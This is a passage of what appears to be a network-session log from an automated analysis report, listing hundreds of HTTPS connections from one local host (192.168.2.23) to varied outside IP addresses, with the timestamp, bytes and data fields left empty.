                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15067192.168.2.2340920115.121.28.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15068192.168.2.2352844152.153.76.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15069192.168.2.2338310204.158.21.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15070192.168.2.235110050.134.183.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15071192.168.2.2351510110.162.110.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15072192.168.2.235121017.2.41.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15073192.168.2.2348580155.70.165.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15074192.168.2.2354134171.174.241.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15075192.168.2.2352336206.116.248.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15076192.168.2.2336484154.217.179.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15077192.168.2.2346400155.1.171.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15078192.168.2.2360200124.198.229.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15079192.168.2.2336326128.133.180.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15080192.168.2.2358072105.104.49.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15081192.168.2.2346742185.217.228.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15082192.168.2.2356982174.95.21.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15083192.168.2.2334432136.109.223.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15084192.168.2.235604443.40.188.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15085192.168.2.23459965.86.129.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15086192.168.2.235290437.60.243.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15087192.168.2.234537432.216.131.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15088192.168.2.234526689.125.63.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15089192.168.2.2344834107.135.255.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15090192.168.2.233811891.49.199.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15091192.168.2.234528231.225.217.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15092192.168.2.233666231.126.142.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15093192.168.2.2352444142.121.164.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15094192.168.2.2350654223.201.124.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15095192.168.2.234032437.124.124.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15096192.168.2.235935671.144.118.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15097192.168.2.2337032138.115.188.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15098192.168.2.2340200202.217.0.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15099192.168.2.235157078.52.14.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15100192.168.2.234626488.122.229.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15101192.168.2.2340866211.14.222.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15102192.168.2.2339396130.50.255.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15103192.168.2.233665687.90.147.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15104192.168.2.234559054.209.226.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15105192.168.2.2359954190.210.255.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15106192.168.2.2347990186.127.208.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15107192.168.2.2337588217.191.96.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15108192.168.2.2353960158.247.11.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15109192.168.2.235374062.216.90.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15110192.168.2.2346770106.55.52.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15111192.168.2.2343802207.173.137.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15112192.168.2.2334598101.89.140.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15113192.168.2.235014852.237.1.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15114192.168.2.235404686.80.143.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15115192.168.2.235219832.25.84.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15116192.168.2.2336612172.246.156.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15117192.168.2.236026234.88.142.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15118192.168.2.2345504114.206.27.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15119192.168.2.233393092.43.61.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15120192.168.2.2353484175.155.141.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15121192.168.2.2334376188.201.54.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15122192.168.2.2348752190.172.72.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15123192.168.2.2341546194.153.203.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15124192.168.2.2352286207.106.169.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15125192.168.2.2344706132.183.47.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15126192.168.2.2357466181.228.41.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15127192.168.2.2340164181.239.18.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15128192.168.2.2348218219.164.96.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15129192.168.2.235729699.102.178.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15130192.168.2.2352686117.110.159.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15131192.168.2.236036498.142.251.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15132192.168.2.233446679.8.119.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15133192.168.2.2338326179.9.44.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15134192.168.2.233308050.102.193.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15135192.168.2.234575651.132.177.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15136192.168.2.2336438188.35.188.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15137192.168.2.2344780121.148.128.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15138192.168.2.233968212.213.221.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15139192.168.2.235745882.132.109.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15140192.168.2.2340372111.199.251.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15141192.168.2.233931482.243.8.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15142192.168.2.2338810174.185.169.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15143192.168.2.235505479.241.38.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15144192.168.2.2341930138.75.236.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15145192.168.2.236020061.29.231.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15146192.168.2.234433054.4.190.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15147192.168.2.234443088.144.25.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15148192.168.2.234778451.133.16.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15149192.168.2.236019296.77.182.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15150192.168.2.233667465.103.134.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15151192.168.2.2338694151.180.172.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15152192.168.2.235949242.87.38.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15153192.168.2.2334178222.59.79.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15154192.168.2.235920276.3.119.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15155192.168.2.2354600172.156.236.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15156192.168.2.2357342145.63.167.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15157192.168.2.2341052175.36.54.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15158192.168.2.2343590216.94.78.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15159192.168.2.2340772102.81.29.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15160192.168.2.2334910104.172.64.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15161192.168.2.233520820.65.157.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15162192.168.2.2351748165.72.98.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15163192.168.2.235533286.216.165.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15164192.168.2.235855819.96.9.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15165192.168.2.235226857.129.16.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15166192.168.2.235214485.27.211.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15167192.168.2.2342468165.7.241.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15168192.168.2.233289040.210.128.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15169192.168.2.233582438.192.101.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15170192.168.2.234529293.53.167.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15171192.168.2.2334036178.13.108.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15172192.168.2.2360018171.178.52.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15173192.168.2.2352790223.137.111.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15174192.168.2.2357566196.152.201.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15175192.168.2.2353594206.119.112.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15176192.168.2.2338234165.137.227.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15177192.168.2.2351858195.155.33.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15178192.168.2.2346168170.0.110.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15179192.168.2.2335646155.18.133.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15180192.168.2.234328869.6.211.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15181192.168.2.235079650.24.31.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15182192.168.2.233643812.31.180.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15183192.168.2.234870040.24.38.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15184192.168.2.2347202143.94.246.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15185192.168.2.2342490131.58.15.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15186192.168.2.2353250115.89.10.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15187192.168.2.2335118180.114.218.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15188192.168.2.2334776179.228.112.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15189192.168.2.2333654194.88.99.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15190192.168.2.2338622189.98.168.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15191192.168.2.2342250210.67.105.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192192.168.2.234680035.212.4.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15193192.168.2.2337878183.92.51.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15194192.168.2.233735441.153.155.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15195192.168.2.2355270161.115.225.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15196192.168.2.2349036141.250.16.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15197192.168.2.2357400187.8.140.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15198192.168.2.234305272.173.241.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15199192.168.2.235993699.167.36.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15200192.168.2.2356370217.198.12.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15201192.168.2.233286864.7.71.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15202192.168.2.2339860113.252.134.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15203192.168.2.2346536106.189.134.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15204192.168.2.233843461.16.48.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15205192.168.2.2340074155.3.105.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15206192.168.2.2338512123.0.230.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15207192.168.2.234299657.167.142.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15208192.168.2.2336558132.149.139.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15209192.168.2.234533817.108.106.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15210192.168.2.235873698.189.88.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15211192.168.2.2346238170.39.211.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15212192.168.2.234680097.50.53.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15213192.168.2.2347668201.155.219.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15214192.168.2.2347676138.207.87.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15215192.168.2.2359434170.60.74.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15216192.168.2.2350460219.141.245.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15217192.168.2.233366093.57.174.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15218192.168.2.233338012.62.68.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15219192.168.2.2336042123.77.61.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15220192.168.2.2334582153.217.93.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15221192.168.2.2335410146.181.95.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15222192.168.2.2334486160.104.213.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15223192.168.2.2346962141.110.57.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15224192.168.2.233616898.35.100.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15225192.168.2.2360070126.64.4.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15226192.168.2.2359202216.113.95.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15227192.168.2.235754654.81.68.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15228192.168.2.233336499.189.30.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15229192.168.2.2352600149.61.181.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15230192.168.2.233533623.75.116.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15231192.168.2.2337710218.141.92.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15232192.168.2.2339418186.36.154.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15233192.168.2.233750299.177.156.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15234192.168.2.2345034135.76.229.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15235192.168.2.2353574193.117.95.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15236192.168.2.235590086.168.143.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15237192.168.2.2348184152.207.109.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15238192.168.2.23608388.140.179.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15239192.168.2.2350590107.67.56.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15240192.168.2.2357912155.80.120.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15241192.168.2.235444844.136.53.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15242192.168.2.2351958137.218.162.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15243192.168.2.2334314184.232.37.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15244192.168.2.235257484.210.254.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15245192.168.2.234339412.202.237.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15246192.168.2.235058841.182.181.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15247192.168.2.234949298.56.29.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15248192.168.2.2353256171.158.100.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15249192.168.2.2335712119.20.28.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15250192.168.2.2345876155.201.164.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15251192.168.2.2359248104.170.176.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15252192.168.2.2343960189.105.34.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15253192.168.2.2353728171.238.163.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15254192.168.2.2353260199.184.165.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15255192.168.2.2357798121.116.236.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15256192.168.2.235518476.184.107.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15257192.168.2.234014498.161.147.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15258192.168.2.2336534138.185.33.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15259192.168.2.233778099.118.243.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15260192.168.2.2338826132.101.67.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15261192.168.2.2340250162.61.62.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15262192.168.2.23607449.205.36.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15263192.168.2.233381419.219.27.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15264192.168.2.2354214211.49.173.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15265192.168.2.2360500126.113.14.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15266192.168.2.2358954156.143.122.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15267192.168.2.2334760174.171.96.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15268192.168.2.2347466142.75.120.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15269192.168.2.2335652207.147.22.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15270192.168.2.2334786177.226.105.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15271192.168.2.235354489.153.122.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15272192.168.2.2333998157.135.232.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15273192.168.2.2349134117.93.14.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15274192.168.2.2346492185.191.74.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15275192.168.2.23555969.239.41.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15276192.168.2.234587058.229.175.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15277192.168.2.2356224187.160.65.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15278192.168.2.2337802185.28.75.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15279192.168.2.233283478.86.180.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15280192.168.2.2343190124.161.45.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15281192.168.2.2341536188.158.114.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15282192.168.2.235735876.183.133.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15283192.168.2.2352738210.110.159.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15284192.168.2.2347876164.87.177.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15285192.168.2.2337042112.194.85.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15286192.168.2.234916044.102.82.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15287192.168.2.2337494180.3.207.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15288192.168.2.2356408184.178.187.181443
